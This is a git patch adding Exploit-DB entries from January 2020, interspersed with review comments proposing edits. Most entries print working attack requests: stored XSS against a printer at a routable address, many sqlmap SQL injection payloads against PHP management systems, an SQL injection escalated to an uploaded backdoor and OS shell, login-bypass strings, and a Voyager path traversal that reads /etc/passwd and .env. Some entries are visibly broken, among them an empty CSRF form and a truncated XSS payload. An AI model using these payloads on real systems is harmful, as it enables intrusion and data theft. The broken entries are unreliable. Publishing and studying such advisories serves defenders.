From 95c6eeab795867992db5cef8b68f8bdfd91cd3b2 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 7 Jan 2020 05:02:07 +0000 Subject: [PATCH] DB: 2020-01-07 33 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) SpotIE 2.9.5 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) TextCrawler Pro3.1.1 - Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) Office Product Key Finder 1.5.4 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) SpotIM 2.2 - 'Name' Denial Of Service FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) Duplicate Cleaner Pro 4 - Denial of Service (PoC) Microsoft Outlook VCF cards - Denial of Service (PoC) Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path Windows - Shell COM Server Registrar Local Privilege Escalation Dairy Farm Shop Management System 1.0 - 'username' SQL Injection Complaint Management System 4.0 - 'cid' SQL injection IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) Hostel Management System 2.0 - 'id' SQL Injection elaniin CMS 1.0 - Authentication Bypass Small CRM 2.0 - Authentication Bypass Voyager 1.3.0 - Directory Traversal Codoforum 4.8.3 - Persistent Cross-Site Scripting Django < 3.0 < 2.2 < 1.11 - Account Hijack Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) --- 
exploits/hardware/webapps/47850.txt | 35 ++++ exploits/php/webapps/47846.txt | 164 +++++++++++++++++ exploits/php/webapps/47847.txt | 45 +++++ exploits/php/webapps/47851.txt | 138 ++++++++++++++ exploits/php/webapps/47854.txt | 49 +++++ exploits/php/webapps/47858.txt | 30 ++++ exploits/php/webapps/47874.txt | 35 ++++ exploits/php/webapps/47875.txt | 50 ++++++ exploits/php/webapps/47876.txt | 22 +++ exploits/python/webapps/47879.md | 31 ++++ exploits/windows/dos/47848.py | 33 ++++ exploits/windows/dos/47853.py | 33 ++++ exploits/windows/dos/47855.py | 33 ++++ exploits/windows/dos/47856.py | 33 ++++ exploits/windows/dos/47857.py | 33 ++++ exploits/windows/dos/47859.py | 33 ++++ exploits/windows/dos/47860.py | 33 ++++ exploits/windows/dos/47861.py | 33 ++++ exploits/windows/dos/47862.py | 28 +++ exploits/windows/dos/47863.py | 33 ++++ exploits/windows/dos/47864.py | 33 ++++ exploits/windows/dos/47865.py | 33 ++++ exploits/windows/dos/47866.py | 33 ++++ exploits/windows/dos/47867.py | 63 +++++++ exploits/windows/dos/47868.py | 33 ++++ exploits/windows/dos/47869.py | 33 ++++ exploits/windows/dos/47870.py | 33 ++++ exploits/windows/dos/47871.txt | 153 ++++++++++++++++ exploits/windows/dos/47873.py | 26 +++ exploits/windows/dos/47878.txt | 93 ++++++++++ exploits/windows/local/47852.txt | 24 +++ exploits/windows/local/47880.cc | 270 ++++++++++++++++++++++++++++ files_exploits.csv | 32 ++++ files_shellcodes.csv | 1 + shellcodes/linux/47877.c | 109 +++++++++++ 35 files changed, 1893 insertions(+) create mode 100644 exploits/hardware/webapps/47850.txt create mode 100644 exploits/php/webapps/47846.txt create mode 100644 exploits/php/webapps/47847.txt create mode 100644 exploits/php/webapps/47851.txt create mode 100644 exploits/php/webapps/47854.txt create mode 100644 exploits/php/webapps/47858.txt create mode 100644 exploits/php/webapps/47874.txt create mode 100644 exploits/php/webapps/47875.txt create mode 100644 exploits/php/webapps/47876.txt create mode 100644 
exploits/python/webapps/47879.md create mode 100755 exploits/windows/dos/47848.py create mode 100755 exploits/windows/dos/47853.py create mode 100755 exploits/windows/dos/47855.py create mode 100755 exploits/windows/dos/47856.py create mode 100755 exploits/windows/dos/47857.py create mode 100755 exploits/windows/dos/47859.py create mode 100755 exploits/windows/dos/47860.py create mode 100755 exploits/windows/dos/47861.py create mode 100755 exploits/windows/dos/47862.py create mode 100755 exploits/windows/dos/47863.py create mode 100755 exploits/windows/dos/47864.py create mode 100755 exploits/windows/dos/47865.py create mode 100755 exploits/windows/dos/47866.py create mode 100755 exploits/windows/dos/47867.py create mode 100755 exploits/windows/dos/47868.py create mode 100755 exploits/windows/dos/47869.py create mode 100755 exploits/windows/dos/47870.py create mode 100644 exploits/windows/dos/47871.txt create mode 100755 exploits/windows/dos/47873.py create mode 100644 exploits/windows/dos/47878.txt create mode 100644 exploits/windows/local/47852.txt create mode 100644 exploits/windows/local/47880.cc create mode 100644 shellcodes/linux/47877.c diff --git a/exploits/hardware/webapps/47850.txt b/exploits/hardware/webapps/47850.txt new file mode 100644 index 000000000..66d635d1b --- /dev/null +++ b/exploits/hardware/webapps/47850.txt 
@@ -0,0 +1,35 @@
+# Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting
+# Date: 2020-01-02
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ibm.com/il-en
+# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN
+# Vulernability Type: Cross-site Scripting
+# Vulenrability: Stored XSS
+# CVE: N/A
+
+# Description :
+# Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the
+# cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.)
+
+HTTP Request :
+
+POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1
+Host: 134.84.35.70
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 281
+Origin: https://134.84.35.70
+Connection: close
+Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html
+Upgrade-Insecure-Requests: 1
+
+0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40=
+
+HTTP Response :
+
+HTTP/1.0 200 OK
+Content-Type: text/html
+Content-Length: 269
\ No newline at end of file
diff --git a/exploits/php/webapps/47846.txt b/exploits/php/webapps/47846.txt
new file mode 100644
index 000000000..42c8beaed
--- /dev/null
+++ b/exploits/php/webapps/47846.txt
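Review bot: The request carries what looks like a routable address, `134.84.35.70`, in the Host, Origin and Referer headers; an advisory should not name a third party's live device, so replace it in all three headers with a placeholder such as `Host: <printer-ip>`. The HTTP response is cut off after `Content-Length: 269`, so nothing in the entry shows the injected `1.network.6.10` value being stored and rendered on general.html; include the response body excerpt or a follow-up GET that reflects the payload. It is also not stated whether the configuration POST requires an authenticated session on the device, which decides whether this is an unauthenticated stored XSS.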
@@ -0,0 +1,164 @@ +# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection +# Google Dork: N/A +# Date: 2020-01-03 +# Exploit Author: Chris Inzinga +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ +# Version: v1.0 +# Tested on: Windows +# CVE: N/A + +# The Dairy Farm Shop Management System 1.0 web application is vulnerable to +# SQL injection in multiple areas. The most severe of these is the username +# parameter on the login page as this injection can be done unauthenticated. + + +================================ 'username' - SQLi ================================ + +POST /dfsms/index.php HTTP/1.1 +Host: 192.168.0.33 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.33/dfsms/index.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 34 +Connection: close +Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg +Upgrade-Insecure-Requests: 1 + +username=test&password=test&login= + +--- +Parameter: username (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'category' & 'categorycode' - SQLi ================================ + +POST /dfsms/add-category.php HTTP/1.1 +Host: 192.168.0.33 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.33/dfsms/add-category.php +Content-Type: 
application/x-www-form-urlencoded +Content-Length: 39 +Connection: close +Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg +Upgrade-Insecure-Requests: 1 + +category=test&categorycode=test&submit= + +--- +Parameter: category (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + +--- +Parameter: categorycode (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'companyname' - SQLi ================================ + +--- +Parameter: companyname (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'productname' & 'productprice' - SQLi ================================ + +--- +Parameter: productname (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit= +--- +--- +Parameter: productprice (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit= +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.12 + + + +================================ 'fromdate' & 'todate' - SQLi 
================================ + +--- +Parameter: todate (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit= + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit= + + Type: UNION query + Title: MySQL UNION query (NULL) - 5 columns + Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit= + +Parameter: fromdate (POST) + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit= +--- + + + +================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================ + +--- +Parameter: emailid (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 
'kFGt'='kFGt&mobilenumber=1234567899&update= +--- +--- +Parameter: adminname (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update= +--- +--- +Parameter: mobilenumber (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update= +--- \ No newline at end of file diff --git a/exploits/php/webapps/47847.txt b/exploits/php/webapps/47847.txt new file mode 100644 index 000000000..23ba25eb4 --- /dev/null +++ b/exploits/php/webapps/47847.txt 
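Review bot: The `'companyname'`, `'productname' & 'productprice'`, `'fromdate' & 'todate'` and `'mobilenumber' & 'emailid' & 'adminname'` sections give only sqlmap output, with no request or path, whereas the first two sections show the full POST; a reader cannot tell which script receives `companyname=` or `fromdate=`. Add the target path for each block (a `POST /dfsms/<script>.php` line above the sqlmap excerpt) and state whether an admin session cookie is needed, since only the `username` injection on index.php is described as unauthenticated. The `update=` blocks appear to be an admin-profile form, so they are post-auth by the entry's own description and should be labelled as such.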
@@ -0,0 +1,45 @@
+# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.0
+# Tested on: Windows 7
+# CVE : N/A
+
+Description:
+
+The Complaint Management System v4.0 application from PHPgurukul is vulnerable to
+blind SQL injection via the 'cid' parameter which is found on the complaint-details.php
+page.
+
+========== 1. SQLi ==========
+
+SQLMAP POC:
+
+GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
+sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests:
+---
+Parameter: cid (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+'
+---
+
+The ?cid parameter is vulnerable to sql injection within the
+
+the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2
+
+request:
+
+GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/php/webapps/47851.txt b/exploits/php/webapps/47851.txt
new file mode 100644
index 000000000..f92a9321b
--- /dev/null
+++ b/exploits/php/webapps/47851.txt
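Review bot: The sentence `The ?cid parameter is vulnerable to sql injection within the` is cut off and should be completed, presumably with `the admin/complaint-details.php page`. The injection point sits under `/cms/admin/` and the request carries a `PHPSESSID` cookie, but the entry never says whether an authenticated admin session is required; state that precondition explicitly, since it determines whether this is pre- or post-auth SQLi. Only a time-based blind vector is shown, so a one-line `--dbs` or `--current-user` result would substantiate impact beyond a five-second delay.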
@@ -0,0 +1,138 @@ +# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-01-05 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://intelliants.com/ +# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5 +# Software : Subrion CMS +# Product Version: v 4.0.5.10 +# Vulernability Type : Cross-Site Request Forgery (Add Admin) +# Vulenrability : Cross-Site Request Forgery +# CVE : N/A + +# Description : +# CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS. +# With this vulnerability, authorized users can be added to the system. + +HTML CSRF PoC : + + + + + +
+ +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/47854.txt b/exploits/php/webapps/47854.txt new file mode 100644 index 000000000..9e0da880b --- /dev/null +++ b/exploits/php/webapps/47854.txt 
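Review bot: The `HTML CSRF PoC :` section consists only of blank added lines in this hunk, so the entry as shown contains no form, target URL, HTTP method or parameter names; this may be markup lost in conversion, but as committed the PoC cannot be reproduced. State the admin endpoint, the method and the field names in plain text alongside the HTML, and say that a logged-in administrator must open the page for the forged request to succeed. The description's `authorized users can be added to the system` should be reworded to say that an attacker can create an administrator account by forging a request from an authenticated admin's browser, which is what "Add Admin" in the title means.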
@@ -0,0 +1,49 @@ +# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection +# Google Dork: intitle: "Hostel management system" +# Date: 2020-01-03 +# Exploit Author: FULLSHADE +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/hostel-management-system/ +# Version: v2.0 +# Tested on: Windows +# CVE : N/A + +Description: + +The Hostel Management System v2.0 application from PHPgurukul is vulnerable to +SQL injection via the 'id' parameter on the full-profile.php page. + +==================== 1. SQLi ==================== + +http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1 + +THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated +user has the full ability to run system commands via --os-shell and fully compromise the system + +GET parameter 'id' is vulnerable. + +--- +Parameter: id (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: id=-3444' OR 1650=1650# + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ + + Type: time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: id=1' OR SLEEP(5)-- slKU + + Type: UNION query + Title: MySQL UNION query (NULL) - 29 columns + Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + +[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php +[14:20:08] [INFO] the backdoor has been successfully 
uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php +[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> whoami +do you want to retrieve the command standard output? [Y/n/a] y +command standard output: 'john-pc\john' +os-shell> \ No newline at end of file diff --git a/exploits/php/webapps/47858.txt b/exploits/php/webapps/47858.txt new file mode 100644 index 000000000..d77166077 --- /dev/null +++ b/exploits/php/webapps/47858.txt @@ -0,0 +1,30 @@ +# Exploit Title: elaniin CMS 1.0 - Authentication Bypass +# Author: riamloo +# Date: 2020-01-02 +# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ ) +# Software Link: https://github.com/elaniin/CMS/archive/master.zip +# Version: 1 +# CVE: N/A +# Tested on: Win 10 + +# Discription: +# Open-source Content Management System created with PHP + MySQL https://elaniin.com/ +# Vulnerability: Attacker can bypass login page and access to dashboard page +# vulnerable file : login.php +# Parameter & Payload: '=''or' +# Proof of Concept: +http://localhost/elaniin/login.php + +POST /elaniin/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +Content-Length: 334 +Referer: http://localhost/elaniin/login.php +Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8 +Connection: close +Upgrade-Insecure-Requests: 1 +email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN \ No newline at end of file diff --git a/exploits/php/webapps/47874.txt b/exploits/php/webapps/47874.txt new file mode 100644 index 000000000..ddebaebfd --- /dev/null +++ b/exploits/php/webapps/47874.txt 
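Review bot: The claim that an unauthenticated user `has the full ability to run system commands via --os-shell and fully compromise the system` only holds in the test setup shown: the sqlmap log writes the stager to `C:/xampp/htdocs/`, which needs the MySQL account to hold the FILE privilege, `secure_file_priv` to permit writes there, and a known, writable web root. Qualify that sentence as environment-dependent (XAMPP defaults) rather than a property of the application, and fix `THe` and `a un-authenticated`. The 29-column UNION vector is the stronger, portable evidence of impact and deserves a one-line data-extraction example.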
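Review bot: The request is not reproducible as printed: `Content-Type: multipart/form-data;` carries no boundary while the body `email=%27%3D%27%27or%27&password=...` is URL-encoded, `Content-Length: 334` does not match that 63-byte body, and there is no blank line separating the headers from the body. Change the header to `Content-Type: application/x-www-form-urlencoded`, set `Content-Length: 63`, and insert the empty line before `email=`. Add one sentence on why `'=''or'` bypasses the check in login.php, since the vulnerable query is not shown.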
@@ -0,0 +1,35 @@
+# Exploit Title: Small CRM 2.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/small-crm-php/
+# Version: V2.0
+# Tested on: Windows
+# CVE : N/A
+
+# Description:
+#
+# There is a SQL injection vulnerability in the /index.php page
+# which allows for an attacker to use the SQLi login bypass payload
+# '=''or' for both the username and password parameters, this allows
+# for any authenticated or low level user to login to the admin account.
+
+========== 1. Authentication bypass ==========
+
+POST /Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Referer: http://10.0.0.214/Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php
+Cookie: PHPSESSID=k5845lo7s90it5p33js75665jq
+Upgrade-Insecure-Requests: 1
+
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&login=
\ No newline at end of file
diff --git a/exploits/php/webapps/47875.txt b/exploits/php/webapps/47875.txt
new file mode 100644
index 000000000..083fa87e9
--- /dev/null
+++ b/exploits/php/webapps/47875.txt
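Review bot: The description contradicts the request: it says the payload goes in `the username and password parameters` and `allows for any authenticated or low level user to login to the admin account`, but the POST uses an `email` field and is sent to the login form itself, so no prior account is needed. Reword it to `'=''or' in both the email and password parameters of admin/index.php lets an unauthenticated attacker log in as the administrator`. The `Cookie: PHPSESSID=...` line is just the pre-login session and should be described as such, or dropped, so it is not read as a requirement.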
@@ -0,0 +1,50 @@ +# Exploit Title: Voyager 1.3.0 - Directory Traversal +# Google Dork: N/A +# Date: January 2020-01-06 +# Exploit Author: NgoAnhDuc +# Vendor Homepage: https://voyager.devdojo.com/ +# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7 +# Version: 1.3.0 and bellow +# Tested on: Ubuntu 18.04 +# CVE : N/A + + +Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php + +======================================== + +public function assets(Request $request) + { + *$path = str_start(str_replace(['../', './'], '', +urldecode($request->path)), '/');* +* $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);* + if (File::exists($path)) { + $mime = ''; + if (ends_with($path, '.js')) { + $mime = 'text/javascript'; + } elseif (ends_with($path, '.css')) { + $mime = 'text/css'; + } else { + $mime = File::mimeType($path); + } + $response = response(File::get($path), 200, +['Content-Type' => $mime]); + $response->setSharedMaxAge(31536000); + $response->setMaxAge(31536000); + $response->setExpires(new \DateTime('+1 year')); + return $response; + } + return response('', 404); + } +======================================== + +PoC: + +passwd: + +http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd + + +Laravel environment +file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F/.env \ No newline at end of file diff --git a/exploits/php/webapps/47876.txt b/exploits/php/webapps/47876.txt new file mode 100644 index 000000000..c01fc4375 --- /dev/null +++ b/exploits/php/webapps/47876.txt 
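Review bot: The entry shows the root cause but not why the payload works or how to fix it: `str_replace(['../', './'], '', ...)` strips each needle in a single pass, so `.....///` loses one `../` and then one `./` and collapses to `../`, which is exactly what every `.....%2F%2F%2F` segment in the PoC becomes. Add that sentence, and recommend canonicalising instead of stripping, e.g. `$real = realpath($path); if ($real === false || strpos($real, realpath($base)) !== 0) { return response('', 404); }` with `$base` being the assets directory. Whether `/admin/voyager-assets` is reachable without an admin session is not stated and decides the severity; also fix `bellow`, the two concatenated Software Link URLs and `Date: January 2020-01-06`.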
@@ -0,0 +1,22 @@
+# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
+# Google Dork: intext:"Powered by Codoforum"
+# Date: 2020-01-03
+# Exploit Author: Prasanth c41m, Vyshnav Vizz
+# Vendor Homepage: https://codoforum.com/index.php
+# Software Link: https://codoforum.com/buy
+# Version: Codoforum 4.8.3
+# Tested on: [relevant os]
+# CVE : [if applicable]
+# source: https://medium.com/@c41m/b2e1133c6a91?
+
+Codoforum is prone to a stored xss vulnerability.
+An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
+Codoforum version 4.8.3 is vulnerable.
+
+1. Install Codoforum 4.8.3 in a local server.
+2. Goto http://localhost/index.php?u=/user/register
+3. Create a user using :-
+ username : ">
+ password : password
+ email : c41m@email.com
+4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.
\ No newline at end of file
diff --git a/exploits/python/webapps/47879.md b/exploits/python/webapps/47879.md
new file mode 100644
index 000000000..00d5c24e2
--- /dev/null
+++ b/exploits/python/webapps/47879.md
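Review bot: The payload in step 3 is printed as `username : ">`, so the element that actually executes is missing (likely stripped as HTML in conversion); write it out escaped, e.g. `"><img src=x onerror=alert(1)>`, otherwise the steps cannot be followed. The template fields `Tested on: [relevant os]` and `CVE : [if applicable]` were never filled in. Since the script fires on `admin/index.php?page=users/manage`, say explicitly that the victim is an administrator viewing the user list, which is what makes a self-registered username a meaningful stored XSS; `to creating user` should read `to create a user`.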
@@ -0,0 +1,31 @@
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip
+
+
+# django_cve_2019_19844_poc
+PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
+
+# Requirements
+
+- Python 3.7.x
+- PostgreSQL 9.5 or higher
+
+## Setup
+
+1. Create database(e.g. `django_cve_2019_19844_poc`)
+1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
+1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
+1. Create the following user with `shell` command:
+
+```python
+>>> from django.contrib.auth import get_user_model
